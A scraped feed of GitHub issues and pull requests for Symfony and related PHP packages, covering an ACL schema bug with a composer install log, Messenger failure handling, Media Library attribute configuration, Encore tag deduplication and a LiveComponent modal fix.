I found that the current security-acl bundle actually implements the same specific unsigned integer in its https://github.com/symfony/security-acl/blob/master/Dbal/Schema.php which were causing https://github.com/symfony/symfony/issues/5108 and were removed in https://github.com/daFish/symfony/commit/57694aaa94ec0118f516e8962be2f018c36d2011 and which led to a merge by FabPot back... in 2012.

Dropping / recreating the DB as well as a fresh composer install did not fix the problem.

More details:

Running within Laragon for Windows 7 with:

  • Apache httpd-2.4.34-win64-VC15
  • MySQL mysql-5.7.19-winx64
  • php-7.2.9-Win32-VC15-x64

DB encoding is utf8_unicode_ci. Tried encoding latin1_swedish_ci with the same issue.

  • symfony/acl-bundle (v1.0.0)
  • symfony/symfony (v3.4.19)
Updating dependencies (including require-dev)
    Finished: success: 0, skipped: 0, failure: 75, total: 75
Package operations: 93 installs, 0 updates, 0 removals
  - Installing symfony/polyfill-ctype (v1.10.0): Downloading (100%)
  - Installing symfony/polyfill-mbstring (v1.10.0): Downloading (100%)
  - Installing twig/twig (v2.5.0): Downloading (100%)
  - Installing paragonie/random_compat (v2.0.17): Downloading (100%)
  - Installing symfony/polyfill-php70 (v1.10.0): Downloading (100%)
  - Installing symfony/polyfill-util (v1.10.0): Downloading (100%)
  - Installing symfony/polyfill-php56 (v1.10.0): Downloading (100%)
  - Installing symfony/symfony (v3.4.19): Loading from cache
  - Installing symfony/polyfill-intl-icu (v1.10.0): Downloading (100%)
  - Installing symfony/polyfill-apcu (v1.10.0): Downloading (100%)
  - Installing psr/simple-cache (1.0.1): Downloading (100%)
  - Installing psr/log (1.1.0): Downloading (100%)
  - Installing psr/link (1.0.0): Downloading (100%)
  - Installing psr/container (1.0.0): Downloading (100%)
  - Installing psr/cache (1.0.1): Downloading (100%)
  - Installing fig/link-util (1.0.0): Downloading (100%)
  - Installing doctrine/lexer (v1.0.1): Downloading (100%)
  - Installing doctrine/annotations (v1.6.0): Downloading (100%)
  - Installing doctrine/reflection (v1.0.0): Downloading (100%)
  - Installing doctrine/event-manager (v1.0.0): Downloading (100%)
  - Installing doctrine/collections (v1.5.0): Downloading (100%)
  - Installing doctrine/cache (v1.8.0): Downloading (100%)
  - Installing doctrine/persistence (v1.1.0): Downloading (100%)
  - Installing doctrine/inflector (v1.3.0): Downloading (100%)
  - Installing doctrine/common (v2.10.0): Downloading (100%)
  - Installing symfony/security-acl (v3.0.1): Downloading (100%)
  - Installing ajgl/csv-rfc (0.1.0): Downloading (100%)
  - Installing ajgl/csv (0.4.0): Downloading (100%)
  - Installing ajgl/csv-bundle (dev-master a6b4873): Cloning a6b487335b from cache
  - Installing friendsofsymfony/ckeditor-bundle (1.1.0): Downloading (100%)
  - Installing monolog/monolog (1.24.0): Loading from cache
  - Installing symfony/monolog-bundle (v3.3.1): Loading from cache
  - Installing sensio/framework-extra-bundle (v5.2.2): Downloading (100%)
  - Installing composer/ca-bundle (1.1.3): Loading from cache
  - Installing sensiolabs/security-checker (v5.0.1): Loading from cache
  - Installing sensio/distribution-bundle (v5.0.23): Loading from cache
  - Installing ramsey/uuid (3.8.0): Loading from cache
  - Installing chadsikorra/php-simple-enum (1.0.0): Loading from cache
  - Installing ldaptools/ldaptools (v0.25.2): Loading from cache
  - Installing ldaptools/ldaptools-bundle (0.9.2): Loading from cache
  - Installing incenteev/composer-parameter-handler (v2.1.3): Loading from cache
  - Installing doctrine/instantiator (1.1.0): Loading from cache
  - Installing doctrine/dbal (v2.9.0): Downloading (100%)
  - Installing doctrine/orm (v2.6.3): Loading from cache
  - Installing doctrine/doctrine-cache-bundle (1.3.5): Loading from cache
  - Installing jdorn/sql-formatter (v1.2.17): Loading from cache
  - Installing doctrine/doctrine-bundle (1.10.0): Downloading (100%)
  - Installing maix-si/connexion (0.6.3): Cloning f1f6a70c31 from cache
  - Installing sonata-project/exporter (1.9.1): Downloading (100%)
  - Installing twig/extensions (v1.5.4): Downloading (100%)
  - Installing sonata-project/datagrid-bundle (2.4.0): Downloading (100%)
  - Installing cocur/slugify (v3.1): Downloading (100%)
  - Installing sonata-project/core-bundle (3.11.2): Downloading (100%)
  - Installing sonata-project/cache (2.0.1): Downloading (100%)
  - Installing sonata-project/block-bundle (3.12.1): Downloading (100%)
  - Installing knplabs/knp-menu (2.3.0): Downloading (100%)
  - Installing knplabs/knp-menu-bundle (v2.2.1): Downloading (100%)
  - Installing sonata-project/admin-bundle (3.38.3): Downloading (100%)
  - Installing sonata-project/doctrine-orm-admin-bundle (3.6.1): Downloading (100%)
  - Installing michelf/php-markdown (1.8.0): Downloading (100%)
  - Installing knplabs/knp-markdown-bundle (1.7.0): Downloading (100%)
  - Installing egeloen/json-builder (3.0.0): Downloading (100%)
  - Installing egeloen/ckeditor-bundle (6.0.1): Downloading (100%)
  - Installing sonata-project/formatter-bundle (3.5.0): Downloading (100%)
  - Installing sonata-project/intl-bundle (2.5.0): Downloading (100%)
  - Installing sonata-project/easy-extends-bundle (2.5.0): Downloading (100%)
  - Installing sonata-project/doctrine-extensions (1.1.2): Downloading (100%)
  - Installing ralouphie/getallheaders (2.0.5): Loading from cache
  - Installing psr/http-message (1.0.1): Downloading (100%)
  - Installing guzzlehttp/psr7 (1.5.2): Downloading (100%)
  - Installing kriswallsmith/buzz (v0.16.1): Downloading (100%)
  - Installing knplabs/gaufrette (v0.6.0): Downloading (100%)
  - Installing phpoption/phpoption (1.5.0): Downloading (100%)
  - Installing phpcollection/phpcollection (0.5.0): Downloading (100%)
  - Installing jms/parser-lib (1.0.0): Downloading (100%)
  - Installing jms/metadata (1.7.0): Downloading (100%)
  - Installing jms/serializer (1.13.0): Downloading (100%)
  - Installing jms/serializer-bundle (2.4.2): Downloading (100%)
  - Installing imagine/imagine (v0.7.1): Downloading (100%)
  - Installing symfony/phpunit-bridge (v3.4.19): Downloading (100%)
  - Installing sonata-project/media-bundle (3.15.0): Downloading (100%)
  - Installing zendframework/zenddiagnostics (v1.3.1): Downloading (100%)
  - Installing sonata-project/notification-bundle (3.5.1): Downloading (100%)
  - Installing swiftmailer/swiftmailer (v5.4.12): Downloading (100%)
  - Installing friendsofsymfony/user-bundle (v2.1.2): Downloading (100%)
  - Installing sonata-project/user-bundle (4.2.3): Downloading (100%)
  - Installing symfony/acl-bundle (v1.0.0): Downloading (100%)
  - Installing symfony/swiftmailer-bundle (v2.6.7): Downloading (100%)
  - Installing sensio/generator-bundle (v3.1.7): Downloading (100%)
  - Installing doctrine/data-fixtures (v1.3.1): Downloading (100%)
  - Installing doctrine/doctrine-fixtures-bundle (3.0.4): Downloading (100%)
  - Installing willdurand/jsonp-callback-validator (v1.1.0): Downloading (100%)
  - Installing friendsofsymfony/jsrouting-bundle (2.2.2): Loading from cache

(...suggestions)

Writing lock file
Generating autoload files
> Incenteev\ParameterHandler\ScriptHandler::buildParameters
Updating the "app/config/parameters.yml" file
> Sensio\Bundle\DistributionBundle\Composer\ScriptHandler::buildBootstrap
> Sensio\Bundle\DistributionBundle\Composer\ScriptHandler::clearCache

 // Clearing the cache for the dev environment with debug
 // true


 [OK] Cache for the "dev" environment (debug=true) was successfully cleared.


> Sensio\Bundle\DistributionBundle\Composer\ScriptHandler::installAssets

 Trying to install assets as relative symbolic links.

(...copy)


 [OK] All assets were successfully installed.


> Sensio\Bundle\DistributionBundle\Composer\ScriptHandler::installRequirementsFile
> Sensio\Bundle\DistributionBundle\Composer\ScriptHandler::prepareDeploymentTarget

My composer.json might help:

{
    "name": "name",
    "license": "license",
    "type": "project",
    "description": "description",
    "autoload": {
        "psr-4": {
            "AppBundle\\": "src/AppBundle",
            "Application\\Sonata\\": "src/Application/Sonata"
        },
        "classmap": [ "app/AppKernel.php", "app/AppCache.php" ]
    },
    "autoload-dev": {
        "psr-4": { "Tests\\": "tests/" },
        "files": [ "vendor/symfony/symfony/src/Symfony/Component/VarDumper/Resources/functions/dump.php" ]
    },
    "require": {
        "php": ">=5.5.9",
        "ext-json": "*",
        "ext-mbstring": "*",
        "ajgl/csv-bundle": "dev-master as 0.5.x-dev",
        "doctrine/doctrine-bundle": "^1.6",
        "doctrine/doctrine-fixtures-bundle": "^3.0",
        "doctrine/orm": "^2.5",
        "friendsofsymfony/ckeditor-bundle": "1.1",
        "friendsofsymfony/jsrouting-bundle": "^2.2",
        "incenteev/composer-parameter-handler": "^2.0",
        "owner/project": "0.6.3",
        "sensio/distribution-bundle": "^5.0.19",
        "sensio/framework-extra-bundle": "^5.0.0",
        "sonata-project/admin-bundle": "3.38.3",
        "sonata-project/block-bundle": "3.12.1",
        "sonata-project/core-bundle": "3.11.2",
        "sonata-project/doctrine-orm-admin-bundle": "3.6.1",
        "sonata-project/easy-extends-bundle": "2.5.0",
        "sonata-project/formatter-bundle": "3.5.0",
        "sonata-project/intl-bundle": "2.5.0",
        "sonata-project/media-bundle": "3.15.0",
        "sonata-project/notification-bundle": "3.5.1",
        "sonata-project/user-bundle": "4.2.3",
        "symfony/acl-bundle": "1.0",
        "symfony/monolog-bundle": "^3.1.0",
        "symfony/polyfill-apcu": "^1.0",
        "symfony/swiftmailer-bundle": "^2.6.4",
        "symfony/symfony": "3.4.*",
        "twig/twig": "^1.0||^2.0"
    },
    "require-dev": {
        "sensio/generator-bundle": "^3.0",
        "symfony/phpunit-bridge": "^3.0"
    },
    "scripts": {
        "symfony-scripts": [
            "Incenteev\\ParameterHandler\\ScriptHandler::buildParameters",
            "Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::buildBootstrap",
            "Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::clearCache",
            "Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::installAssets",
            "Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::installRequirementsFile",
            "Sensio\\Bundle\\DistributionBundle\\Composer\\ScriptHandler::prepareDeploymentTarget"
        ],
        "post-install-cmd": [
            "@symfony-scripts"
        ],
        "post-update-cmd": [
            "@symfony-scripts"
        ]
    },
    "config": {
        "platform": {
            "php": "7.2"
        },
        "sort-packages": true
    },
    "extra": {
        "symfony-app-dir": "app",
        "symfony-bin-dir": "bin",
        "symfony-var-dir": "var",
        "symfony-web-dir": "web",
        "symfony-tests-dir": "tests",
        "symfony-assets-install": "relative",
        "incenteev-parameters": {
            "file": "app/config/parameters.yml"
        },
        "branch-alias": {
            "dev-master": "3.4-dev"
        }
    },
    "repositories": [
        {
          "type": "git",
          "url": "[email protected]:owner/project.git"
        }
    ]
}

I cannot tell if this has any effect on ACL since I have not yet implemented it.

Anything to do?

Regards

View more
7 comments
smilearric

smilearric

6th Dec 2018 @ 15:47

Since version 3.2.0 Seldaek/monolog added the new GoogleCloudLoggingFormatter (see #1690).

It would probably make sense to declare it as a service in this bundle.

View more
👍 1
no-simpler

no-simpler

23rd Aug 2022 @ 10:57

Bug Status: Needs Review Messenger

Symfony version(s) affected

all I guess

Description

If I use AMQP for async messages, and doctrine for failures messages, and doctrine connection is broken (ie: my DB is down), I loose my failed messagess!

Note: This is juste an exception who explain that there is some hole in the sequence.

How to reproduce

The code :

<?php

namespace App\MessageHandler;

use App\Message\Foobar;
use Symfony\Component\Console\Attribute\AsCommand;
use Symfony\Component\Messenger\Attribute\AsMessageHandler;
use Symfony\Component\Messenger\MessageBusInterface;

#[AsMessageHandler]
final class FoobarHandler
{
    public function __invoke(Foobar $message): void
    {
        throw new \RuntimeException(str_repeat('.', 1));
    }

    #[AsCommand(
        name: 'app:messenger:dispatch:foobar',
        description: 'Dispatch a Foobar message.',
    )]
    public function dispatchMessage(MessageBusInterface $bus): int
    {
        $bus->dispatch(new Foobar());

        return 0;
    }
}

and

<?php
// test.php

require __DIR__.'/vendor/autoload.php';

$conn = new AmqpConnection([
    'host' => 'localhost',
    'port' => 5672,
    'username' => 'guest',
    'password' => 'guest',
]);
$conn->connect();
$channel = new AmqpChannel($conn);

$queue = new AmqpQueue($channel);
$queue->setName('messages');
$queue->setFlags(AMQP_PASSIVE);
$queue->declareQueue();

$message = $queue->get();
if (!$message) {
    echo "No message in the queue.\n";
    exit(0);
}

dump($message);
>…home/gregoire/dev/labs/symfony/symfony-8.1(main *+%) php test.php 
No message in the queue.
>…home/gregoire/dev/labs/symfony/symfony-8.1(main *+%) bin/console app:messenger:dispatch:foobar 
>…home/gregoire/dev/labs/symfony/symfony-8.1(main *+%) bin/console messenger:consume async -q
17:26:37 CRITICAL  [messenger] Error thrown while handling message App\Message\Foobar. Removing from transport after 3 retries. Error: "Handling "App\Message\Foobar" failed: ." ["class" => "App\Message\Foobar","message_id" => null,"retryCount" => 3,"error" => "Handling "App\Message\Foobar" failed: .","exception" => Symfony\Component\Messenger\Exception\HandlerFailedException^ { …}]

In DoctrineSender.php line 48:
                                                                                                                                      
  An exception occurred in the driver: SQLSTATE[08006] [7] connection to server at "127.0.0.1", port 5432 failed: Connection refused  
        Is the server running on that host and accepting TCP/IP connections?                                                               
                                                                                                                                      

In ExceptionConverter.php line 78:
                                                                                                                                      
  An exception occurred in the driver: SQLSTATE[08006] [7] connection to server at "127.0.0.1", port 5432 failed: Connection refused  
        Is the server running on that host and accepting TCP/IP connections?                                                               
                                                                                                                                      

In Exception.php line 24:
                                                                                                 
  SQLSTATE[08006] [7] connection to server at "127.0.0.1", port 5432 failed: Connection refused  
        Is the server running on that host and accepting TCP/IP connections?                          
                                                                                                 

In PDOConnect.php line 28:
                                                                                                 
  SQLSTATE[08006] [7] connection to server at "127.0.0.1", port 5432 failed: Connection refused  
        Is the server running on that host and accepting TCP/IP connections?                          
                                                                                                 

messenger:consume [-l|--limit LIMIT] [-f|--failure-limit FAILURE-LIMIT] [-m|--memory-limit MEMORY-LIMIT] [-t|--time-limit TIME-LIMIT] [--sleep SLEEP] [-b|--bus BUS] [--queues QUEUES] [--no-reset [NO-RESET]] [--all] [--exclude-receivers EXCLUDE-RECEIVERS] [--keepalive [KEEPALIVE]] [--fetch-size FETCH-SIZE] [--] [<receivers>...]

>…home/gregoire/dev/labs/symfony/symfony-8.1(main *+%) bin/console messenger:consume async -q
17:26:45 CRITICAL  [messenger] Error thrown while handling message App\Message\Foobar. Removing from transport after 3 retries. Error: "Redelivered message from AMQP detected that will be rejected and trigger the retry logic." ["class" => "App\Message\Foobar","message_id" => null,"retryCount" => 3,"error" => "Redelivered message from AMQP detected that will be rejected and trigger the retry logic.","exception" => Symfony\Component\Messenger\Exception\RejectRedeliveredMessageException^ { …}]

In DoctrineSender.php line 48:
                                                                                                                                      
  An exception occurred in the driver: SQLSTATE[08006] [7] connection to server at "127.0.0.1", port 5432 failed: Connection refused  
        Is the server running on that host and accepting TCP/IP connections?                                                               
                                                                                                                                      

In ExceptionConverter.php line 78:
                                                                                                                                      
  An exception occurred in the driver: SQLSTATE[08006] [7] connection to server at "127.0.0.1", port 5432 failed: Connection refused  
        Is the server running on that host and accepting TCP/IP connections?                                                               
                                                                                                                                      

In Exception.php line 24:
                                                                                                 
  SQLSTATE[08006] [7] connection to server at "127.0.0.1", port 5432 failed: Connection refused  
        Is the server running on that host and accepting TCP/IP connections?                          
                                                                                                 

In PDOConnect.php line 28:
                                                                                                 
  SQLSTATE[08006] [7] connection to server at "127.0.0.1", port 5432 failed: Connection refused  
        Is the server running on that host and accepting TCP/IP connections?                          
                                                                                                 

messenger:consume [-l|--limit LIMIT] [-f|--failure-limit FAILURE-LIMIT] [-m|--memory-limit MEMORY-LIMIT] [-t|--time-limit TIME-LIMIT] [--sleep SLEEP] [-b|--bus BUS] [--queues QUEUES] [--no-reset [NO-RESET]] [--all] [--exclude-receivers EXCLUDE-RECEIVERS] [--keepalive [KEEPALIVE]] [--fetch-size FETCH-SIZE] [--] [<receivers>...]

>…home/gregoire/dev/labs/symfony/symfony-8.1(main *+%) php test.php 
No message in the queue.

Possible Solution

I tried to read the messenger code, but it became too hacky for me :/ Sorry

Additional Context

No response

View more
1 comment
lyrixx

lyrixx

10th Jul 2026 @ 15:32

Store RFC

TL;DR: add a RegexSplitTransformer to src/store that splits a document's content on a configurable regex (e.g. Markdown headers), meant to run before TextSplitTransformer in the chain. Complements #1250 / #1258, doesn't replace them.

Problem

TextSplitTransformer only chunks by fixed length + overlap, it has no notion of document structure, so a heading can end up split mid-chunk. A regex pre-split (e.g. on Markdown #/##) lets each section be chunked independently, keeping chunks on-topic.

Relation to #1250 / #1258

#1250 asks for a generic RecursiveCharacterTextTransformer (paragraph, then line, then word, then char fallback) and already calls out header-based splitting as a natural follow-up. #1258 attempted that recursive splitter but stalled and was closed for inactivity. Its author even noted LangChain does this kind of thing with regex.

The two are complementary, not competing: the recursive splitter is structure-agnostic (pure length enforcement), a regex splitter is structure-aware (can attach heading metadata). LangChain ships both (MarkdownHeaderTextSplitter + RecursiveCharacterTextSplitter) for that reason.

Proposed API

final class RegexSplitTransformer implements TransformerInterface
{
    public function __construct(
        private readonly string $pattern,
        private readonly bool $keepDelimiter = true,
    ) {
    }

    public function transform(iterable $documents, array $options = []): iterable
    {
        if (!class_exists(UnicodeString::class)) {
            throw new RuntimeException('For using the RegexSplitTransformer, the Symfony String component is required. Try running "composer require symfony/string".');
        }

        // (new UnicodeString($document->content))->split($pattern, flags: PREG_SPLIT_DELIM_CAPTURE),
        // yield one document per fragment, carrying Metadata::KEY_TITLE / KEY_DEPTH
        // for the matched heading, and Metadata::KEY_PARENT_ID back to the original
        // document (both already exist on Metadata, no schema change needed)
    }
}

Named generically (RegexSplitTransformer, not HeaderSplitTransformer) so it covers any delimiter, not just Markdown headers, e.g. --- separators or custom section markers.

Usage

ai:
  indexer:
    my_indexer:
      transformers:
        - 'Symfony\AI\Store\Document\Transformer\RegexSplitTransformer'
        - 'Symfony\AI\Store\Document\Transformer\TextSplitTransformer'

Transformer order is already fully controlled by this config list (no tagged_iterator), so header-split-then-length-split works today without any priority mechanism. A formal getPriority() could be worth considering later, only if transformers move to tag-based autoconfiguration. Out of scope here.

View more
jvancoillie

jvancoillie

1st Jul 2026 @ 06:25

good first issue hacktoberfest

The dashboard should offer the ability to toggle the theme between:

  • Automatic (System)
  • Light
  • Dark

Further, the dashboard should have a "Theme" option to force a theme mode.

View more
2 comments
jbrooksuk

jbrooksuk

3rd Oct 2024 @ 18:34

The default prod settings since about symfony 5 in monolog.yaml are these:

when@prod:
    monolog:
        handlers:
            main:
                type: fingers_crossed
                action_level: error
                handler: nested
                excluded_http_codes: [404, 405]
                buffer_size: 50 # How many messages should be saved? Prevent memory leaks
            nested:
                type: stream
                path: php://stderr
                level: debug
                formatter: monolog.formatter.json
            console:
                type: console
                process_psr_3_messages: false
                channels: ["!event", "!doctrine"]
            deprecation:
                type: stream
                channels: [deprecation]
                path: php://stderr

Unlike the dev settings, which work like a charm, but about causing problems, one basically could think that the only possible problem of these settings is "lack of proper log". However, I've been working in an app for several years, since symfony 3 (where it worked ok), but when trying to upgrade to symfony 5 (and later, 6.x), it had a weird misfunctionality when a user tried to login in the app. The only difference I could find with other apps new or upgraded that work without problem (except the above mention to "lack of proper log") is that this uses a custom query for login, instead of the default method. Only in some specific circumstances in prod the login worked as expected, while in the rest, it didn't like in dev, without any kind of logging that could help to debug the issue. Since this "lack of proper log" didn't prevent any other apps to work, I didn't think to cause any misfunction in the app itself. Then I decided to have some log in order to debug the problem by cloning the dev settings in the "main" section of monolog settings for prod, and since by doing nothing else I started to have proper log, I didn't do anything else. The misfunction was still happenning. Only when I decided to clean the prod cache (since I think shouldn't be necessary since there were no changes in the code), I found out that the app worked as expected, and the misfunction went away. I've been able to reproduce this behaviour in the three servers where I've tried to test the upgraded app. At this moment, I don't know why this happens, and this is the reason why I write this issue, in order to prevent others to find the same problem. There might be an issue somewhere else that leads to this, or it's just that "the new default prod settings are buggy and should be changed".

If you want more details, I started a thread in stackoverflow

Thanks in advance.

View more
1 comment
omgslinux

omgslinux

7th Sep 2023 @ 07:20

A new major version of Media Library

This PR collects the work for the next major version of Media Library on a single branch. It focuses on more ergonomic configuration and better control over what happens after you add a file. Breaking changes are on the table. It supersedes #3943 and #3944, which are combined here.

Feedback and feature ideas are very welcome (see the bottom). Nothing is locked in yet.

Feature 1: Attribute-based configuration

Declare media collections and conversions with PHP attributes, as an alternative to (and coexisting with) registerMediaCollections() / registerMediaConversions().

use Spatie\Image\Enums\Fit;
use Spatie\MediaLibrary\Attributes\MediaCollection;
use Spatie\MediaLibrary\Attributes\MediaConversion;

#[MediaCollection(name: 'avatar', singleFile: true, fallbackUrl: '/default-avatar.png')]
#[MediaConversion(name: 'thumb', collections: ['avatar'], width: 150, height: 150, fit: Fit::Crop, format: 'webp')]
class User extends Model implements HasMedia
{
    use InteractsWithMedia;
}

Both attributes are repeatable. A conversion with no collections applies to every collection on the model.

#[MediaCollection(name: 'documents', onlyKeepLatest: 10, acceptsMimeTypes: ['application/pdf'])]
#[MediaCollection(name: 'photos', disk: 'media', conversionsDisk: 'media', responsiveImages: true)]
#[MediaConversion(name: 'hero', collections: ['photos'], width: 1600, responsiveImages: true, queued: false)]
class Article extends Model implements HasMedia
{
    use InteractsWithMedia;
}

Attributes and methods combine. The static configuration lives in attributes, the dynamic tail (the full spatie/image manipulation set, per-media conversions, acceptsFile() closures) stays in methods, and a method declaration overrides a same-named attribute.

#[MediaCollection(name: 'gallery')]
#[MediaConversion(name: 'thumb', collections: ['gallery'], width: 150, height: 150)]
class Product extends Model implements HasMedia
{
    use InteractsWithMedia;

    public function registerMediaConversions(?Media $media = null): void
    {
        $this->addMediaConversion('watermarked')
            ->watermark(storage_path('logo.png'));
    }
}
  • A MediaAttributeResolver reads the attributes via reflection (cached per model class) and turns them into the same builder objects the methods already produce.
  • Attributes resolve first, then the methods run on top.
  • Clear exceptions for a conversion referencing an unknown collection and for duplicate collection names.
  • Argument surface. #[MediaCollection]: name, singleFile, onlyKeepLatest, acceptsMimeTypes, disk, conversionsDisk, fallbackUrl, fallbackPath, responsiveImages. #[MediaConversion]: name, collections, width, height, fit, format, quality, queued, responsiveImages, keepOriginalImageFormat.
  • Docs: docs/basic-usage/configuring-with-attributes.md.

Feature 2: Run code after conversions with then() / catch()

Run code after a media item's conversions and responsive images finish generating, with failure handling. This mirrors the then / catch ergonomics of spatie/laravel-pdf, adapted to how Media Library generates derivatives.

use Spatie\MediaLibrary\MediaCollections\Models\Media;
use Throwable;

$model->addMedia($request->file('avatar'))
    ->then(function (Media $media) {
        // runs after the derivatives are generated
    })
    ->catch(function (Throwable $exception) {
        // runs if derivative generation fails
    })
    ->toMediaCollection('avatars');
  • The then callback receives the Media, the catch callback receives the Throwable.
  • Using then() runs the derivatives on the queue and fires the callback when they finish. With the sync queue driver it runs inline. toMediaCollection() still returns the Media synchronously.
  • The derivatives run inside a single orchestrator job with a plain try/catch, so then and catch behave deterministically across Laravel versions and queue drivers.
  • If a media item produces no derivatives, then fires immediately.
  • Callbacks are serialized to run on the queue, so they cannot capture non serializable state.
  • Adds laravel/serializable-closure to require. Docs: docs/advanced-usage/running-code-after-conversions.md.

Feature 3: Enum collection names

Anywhere a collection name is accepted you can now pass a string-backed enum instead of a string. This covers the attributes, addMediaCollection(), toMediaCollection() (and variants), the getMedia() / getFirstMedia() / URL / path family, clearMediaCollection(), and performOnCollections(). The enum is resolved to its value, so existing string usage is unchanged.

enum MediaCollectionName: string
{
    case Avatar = 'avatar';
}

#[MediaCollection(name: MediaCollectionName::Avatar, singleFile: true)]
#[MediaConversion(name: 'thumb', collections: [MediaCollectionName::Avatar], width: 150, height: 150)]
class User extends Model implements HasMedia
{
    use InteractsWithMedia;
}
$user->addMedia($request->file('avatar'))->toMediaCollection(MediaCollectionName::Avatar);

$user->getFirstMediaUrl(MediaCollectionName::Avatar, 'thumb');

Implemented via a small Spatie\MediaLibrary\Support\CollectionName helper. Requested in discussion #3833. Docs: docs/basic-usage/configuring-with-attributes.md.

Status

Full suite green (447 passed), PHPStan clean.

Feedback welcome

If you have feature ideas, API feedback, or use cases the current design does not cover, please comment here or open a discussion. We would love your input on what the next major version of Media Library should include.

View more
freekmurze

freekmurze

15th Jun 2026 @ 11:57

enhancement Keep open

Hello,

I think it would be interesting if I could pass to encore_entry_link_tags and encore_entry_script_tags functions that I want to generate tags with absolute url. Now, if I want to get absolute url, I can't use encore_entry_link_tags and encore_entry_script_tags.

View more
26 comments 👍 24
dariogrd

dariogrd

29th Nov 2018 @ 16:56

After adding sentry to symfony project, many deprecated errors appeared.

One of them: User Deprecated: The "Monolog\Logger" class is considered final. It may change without further notice as of its next major version. You should not extend it from "Symfony\Bridge\Monolog\Logger".

I am using:

  • Symfony: 6.1.8
  • Monolog-bundle: 3.2
  • Sentry: 3:12

My sentry.yaml:

sentry:
    dsn: '%env(SENTRY_DSN)%'
    register_error_listener: false
    options:
        environment: "%kernel.environment%.%env(APP_DOMAIN)%"
        release: '%env(APP_RELEASE)%'

monolog:
    handlers:
        sentry:
            type: sentry
            level: !php/const Monolog\Logger::ERROR
            hub_id: Sentry\State\HubInterface
View more
1 comment
DZymelka

DZymelka

6th Dec 2022 @ 15:49

Status: Needs Review

Fixes #22216

View more
lacatoire

lacatoire

2nd Apr 2026 @ 06:15

When calling encore_entry_link_tags() in a Twig template, the underlying PHP code has some safe-guarding in place to ensure the same link tag isn't outputted twice:

https://github.com/symfony/webpack-encore-bundle/blob/5e1cab3d223f65933d59a5a95ea01a6ed2833db4/src/Asset/EntrypointLookup.php#L84-L89

I'm not entirely sure of the rationale behind this, but it causes an issue when encore_entry_link_tags() is called twice in the same request.

This issue came to light when investigating why an order confirmation page of a website wasn't outputting a stylesheet's link tag. After some debugging I figured out it was because the controller for this page sends a confirmation email with an attached PDF which is rendered via HTML/Twig.

The Twig template for the PDF called encore_entry_link_tags(), so when the confirmation page was loaded and encore_entry_link_tags() was called a second time, nothing was returned.

I have worked around this by calling the reset() method of the EntrypointLookup object right after the confirmation email is sent but it feels like a bit of a hack.

Why does the "make sure to not return the same file multiple times" code need to be there? Can it be removed, or can the issue it solves be solved in a different way?

Relevant Slack discussion: https://symfony-devs.slack.com/archives/C5VHNHY11/p1562584991057800

View more
13 comments 👍 6
andyexeter

andyexeter

9th Jul 2019 @ 09:57

Q A
Issues -
License MIT

Added 2 demos for creating infinite scrolling using Turbo

View more
2 comments 👍 1 👀 1
ker0x

ker0x

27th Apr 2026 @ 08:49

Documentation Status: Needs Review Toolkit
View more
9 comments
seb-jean

seb-jean

2nd Jun 2026 @ 18:50

Bug Status: Needs Review LiveComponent
Q A
Bug fix? yes
New feature? no
Deprecations? no
Issues Fix #3496
License MIT

Summary

When the server-error overlay is closed twice in quick succession (double-click, or a click + Escape within the same tick), the second close throws:

NoModificationAllowedError: Failed to set the 'outerHTML' property on 'Element': This element has no parent node.

The root cause (nicely identified by @maarten-mymmo in #3496) is that both close listeners call closeModal(modal) with the same captured reference: the first call detaches the element via modal.outerHTML = '', and the second call then hits the DOM spec rule that outerHTML can't be set on a parent-less element.

Fix

Swap modal.outerHTML = '' for Element.remove(), which is idempotent and safe on detached elements. Same observable effect (element gone), one less footgun.

Test plan

  • 4/4 tests in src/LiveComponent/assets/test/unit/controller/error.test.ts pass (3 existing + 1 new).
  • New regression test closing the error modal twice does not throw documents the invariant.
  • ℹ️ Note on the test: jsdom doesn't enforce the real-browser NoModificationAllowedError on outerHTML for detached elements, so the test can't actively catch a regression to outerHTML. It still guards the "close-twice → clean state, no throw" contract and serves as living documentation.
View more
1 comment
Amoifr

Amoifr

24th Apr 2026 @ 08:36

dependencies

Bumps nanoid from 3.3.7 to 3.3.8.

Dependabot compatibility score

You can trigger a rebase of this PR by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot merge will merge this PR after your CI passes on it
  • @dependabot squash and merge will squash and merge this PR after your CI passes on it
  • @dependabot cancel merge will cancel a previously requested merge and block automerging
  • @dependabot reopen will reopen this PR if it is closed
  • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) You can disable automated security fix PRs for this repo from the Security Alerts page.

Note Automatic rebases have been disabled on this pull request as it has been open for over 30 days.

View more
dependabot[bot]

dependabot[bot]

14th Dec 2024 @ 10:51

Adds a data-driven test asserting that once() memoizes falsey return values (null, false, 0, 0.0, '', '0', []): the value is returned as-is and the callback runs exactly once.

This locks in the current behaviour so a truthiness-based cache check (as proposed in #116) can't regress it unnoticed.

View more
freekmurze

freekmurze

9th Jul 2026 @ 10:50

Platform RFC

Currently it is possible to define a schema for structured output through a class s.

'response_format' => MathReasoning::class,

or a concrete schema s.

'response_format' => [
    'type' => 'json_schema',
    'json_schema' => [
        'name' => 'clock',
        'strict' => true,
        'schema' => [
            // ...
        ],
    ],
],

Working with different LLM providers they all have different JSON schema restrictions i.e. OpenAI needs that all properties are required which is not needed for Gemini and there are many more differences, especially if your object is a complex object with nested objects.

So currently there is already a ResponseFormatFactoryInterface but which only works with classes, I think it would be great if we could assign a string like:

'response_format' => 'my_custom_schema',

and the ResponseFormatFactoryInterface returns a fitting schema for this identifier. Through this the ResponseFormatFactoryInterface implementation could contain a list of predefined schemas which can be used. These schemas could also be loaded through the filesystem or other sources.

Despite the response_format there is also an inputSchema and outputSchema at a "Tool" where we need a schema to describe the input and output. Maybe we could also use this factory to resolve those schemas.

